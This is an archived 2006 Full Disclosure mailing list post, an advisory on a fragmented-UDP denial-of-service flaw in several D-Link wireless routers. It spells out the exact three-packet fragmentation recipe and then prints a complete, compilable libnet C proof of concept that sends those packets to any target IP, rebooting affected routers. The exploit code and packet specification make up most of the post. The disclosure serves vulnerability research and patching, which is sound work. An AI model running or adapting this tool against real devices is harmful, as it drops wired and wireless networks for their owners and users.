Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

[thunkers.net] D-Link Fragmented UDP DoS Vulnerability
From: deft <deft () thunkers net>
Date: Fri, 10 Feb 2006 16:44:50 -0500


At the time of discovery the issue affected the latest D-Link firmwares.
As D-Link has since released a new firmware, this is no longer the case, so...
cheers...

---
Aaron Portnoy

------------------------------------------------------------------------------------


D-Link Fragmented UDP Denial of Service Vulnerability

Aaron Portnoy, aportnoy () ccs . neu . edu   ||   deft () thunkers . net
http://www.thunkers.net/~deft/advisories/dlink_udp_dos.txt
December 8, 2005


DESCRIPTION
-----------

Remote exploitation of a design error flaw in multiple D-Link wireless access
points could allow attackers to create a denial of service condition on the
affected machine and therefore the wired and wireless network itself.

Code execution is believed to be possible, but considering D-Link has since
patched this issue I've dropped the research. This issue was discovered before
said patch was released. Similar fragmentation vulns in Dlink products have
been
released in the past, but as this vulnerability affects the latest firmware (at
the time of this writing) I consider this still somewhat legit.

I myself don't know too much about hardware exploitation, so I leave this up to
the better suited of you out there.


ANALYSIS
---------

Successful exploitation of the described vulnerability allows remote attackers
to reboot the target router. Exploitation will occur given that the attacker
send 3 successive fragmented UDP packets with the following specifications:


All packets must have the same Identification Number in the IP Header.

Packet 1:
The MORE_FRAGMENTS flag must be set to 1. (value IP_MF)
The fragmentation offset equal to 0.
The packet's payload size consists of 8 bytes. NULL bytes were tested in
the proof of concept.

Packet 2:
The MORE_FRAGMENTS flag set to 1. (value 0x2002)
The fragmentation offset equal to 16.
Payload is 8 bytes long.

Packet 3:
The MORE_FRAGMENTS flag set to 0. (value 0x0003)
The fragmentation offset equal to 24.
Payload is 8 bytes long.

In tests the affected routers would instantly terminate all current
connections. The DI-524 would take approximately one minute to then reboot
and restore a connections. The DI-624 would take approximately 30 seconds.


MITIGATING FACTORS
-------------------

This vulnerability has been confirmed to work from at most 4 hops from the
intended target. Depending on how routers/switches and other hardware placed
between the attacker and the router further fragment or reassembly the packets,
the denial of service condition may not be triggered.


DETECTION
----------

The following hardware and firmware versions are confirmed vulnerable:

* D-Link DI-524 Wireless Router, firmware 3.20 August 18, 2005 (latest
firmware at the time of this writing)

* D-Link DI-624 Wireless Router, unknown firmware

* D-Link DI-784, unknown firmware

* REPORTED: US Robotics' USR8054.


The following hardware do not appear to be vulnerable:

* D-Link DI-614+ Wireless Router

* D-Link DI-604 Ethernet Broadband Router



CREDIT
------

Vulnerability discovered by Aaron Portnoy (deft () thunkers ! net) and Keefe
Johnson.


EXPLOIT CODE
------------

The following proof of concept code successfully triggers the denial of service
condition:


/*
 *
 * Aaron Portnoy
 *
 * silc.thunkers.net, thunkers
 *
 * D-Link Wireless Access Point
 * Fragmented UDP DoS Proof of Concept
 *
 *
 * gcc -o dlink_dos dlink_dos.c -lnet -Wall
 *
 */

#include <libnet.h>

#define DEVICE "eth0"
#define SRC_IP "127.0.0.1"
#define DST_IP "127.0.0.1"
#define SRC_PRT 200
#define DST_PRT 11111

void usage (char *name)
{
    fprintf (stderr,
             "Usage: %s -s <source ip> -d <destination ip>\
                        -a <source port> -b <destination port>\n",
             name);

    exit (EXIT_FAILURE);
}

int gen_packet (char *device, char *pSRC, char *pDST, u_short sPRT,
                u_short dPRT, int count)
{

    libnet_t *l = NULL;
    libnet_ptag_t udp = 0;
    libnet_ptag_t ip = 0;

    char errbuf[LIBNET_ERRBUF_SIZE];
    char *payload = NULL;
    u_short payload_s = 0, src_prt, dst_prt;
    u_long src_ip, dst_ip;
    int c, frag;

    if (!device)
        device = DEVICE;

    l = libnet_init (LIBNET_RAW4, device, errbuf);

    if (!l) {
        fprintf (stderr, "libnet_init() failed: %s\n", errbuf);
        exit (EXIT_FAILURE);
    }

    src_ip = pSRC ? libnet_name2addr4 (l, pSRC, LIBNET_RESOLVE) :
        libnet_name2addr4 (l, SRC_IP, LIBNET_RESOLVE);

    dst_ip = pDST ? libnet_name2addr4 (l, pDST, LIBNET_RESOLVE) :
        libnet_name2addr4 (l, DST_IP, LIBNET_RESOLVE);

    src_prt = sPRT ? sPRT : SRC_PRT;

    dst_prt = dPRT ? dPRT : DST_PRT;

    if (count == 1) {
        payload = "\0\0\0\0\0\0\0\0";
        payload_s = 8;
    }

    udp = libnet_build_udp (src_prt,
                            dst_prt,
                            (LIBNET_UDP_H + payload_s) * 2,
                            0, (unsigned char *)payload, payload_s, l, udp);

    if (udp == -1) {
        fprintf (stderr, "Can't build UDP header: %s\n", libnet_geterror (l));
        exit (EXIT_FAILURE);
    }

    switch (count) {

    case 1:
        frag = IP_MF;
        break;

    case 2:
        frag = 0x2002;
        break;

    case 3:
        frag = 0x0003;
        break;
    }

    ip = libnet_build_ipv4 (20,
                            0,
                            1800,
                            frag,
                            128,
                            IPPROTO_UDP, 0, src_ip, dst_ip, NULL, 0, l, ip);

    if (ip == -1) {
        fprintf (stderr, "Can't build IP header: %s\n", libnet_geterror (l));
        exit (EXIT_FAILURE);
    }

    c = libnet_write (l);

    if (c == -1) {
        fprintf (stderr, "Write error: %s\n", libnet_geterror (l));
        exit (EXIT_FAILURE);
    }

    printf ("Wrote UDP packet; check the wire.\n");

    libnet_destroy (l);

    return (EXIT_SUCCESS);

}

int main (int argc, char **argv)
{

    int i;
    char *pDST, *pSRC, *device;
    u_short dPRT = 0;
    u_short sPRT = 0;

    pDST = pSRC = device = NULL;

    while ((i = getopt (argc, argv, "D:d:s:a:b:h")) != EOF) {
        switch (i) {
        case 'D':
            device = optarg;
            break;
        case 'd':
            pDST = optarg;
            break;
        case 's':
            pSRC = optarg;
            break;
        case 'a':
            sPRT = atoi (optarg);
            break;
        case 'b':
            dPRT = atoi (optarg);
            break;
        case 'h':
            usage (argv[0]);
            break;
        }
    }

    printf ("\n----------------------------------\n");
    printf ("      -=    D-Link DoS PoC     =-\n");
    printf ("          Aaron Portnoy\n");
    printf ("       deft () thunkers ! net     \n");
    printf ("   silc.thunkers.net, thunkers\n");
    printf ("----------------------------------\n");


    device ? printf ("\nDevice: \t%s\n", device) :
        printf ("\nDevice: \t%s\n", DEVICE);

    pSRC ? printf ("SRC IP: \t%s\n", pSRC) :
        printf ("SRC IP: \t%s\n", SRC_IP);

    pDST ? printf ("DST IP: \t%s\n", pDST) :
        printf ("DST IP: \t%s\n", DST_IP);

    sPRT ? printf ("SPort: \t\t%d\n", sPRT) :
        printf ("SPort: \t\t%d\n", SRC_PRT);

    dPRT ? printf ("DPort: \t\t%d\n\n", dPRT) :
        printf ("DPort: \t\t%d\n\n", DST_PRT);

    for (i = 1; i <= 3; i++)
        gen_packet (device, pSRC, pDST, sPRT, dPRT, i);
    printf ("\n");

    return (EXIT_SUCCESS);
}

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • [thunkers.net] D-Link Fragmented UDP DoS Vulnerability deft (Feb 10)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]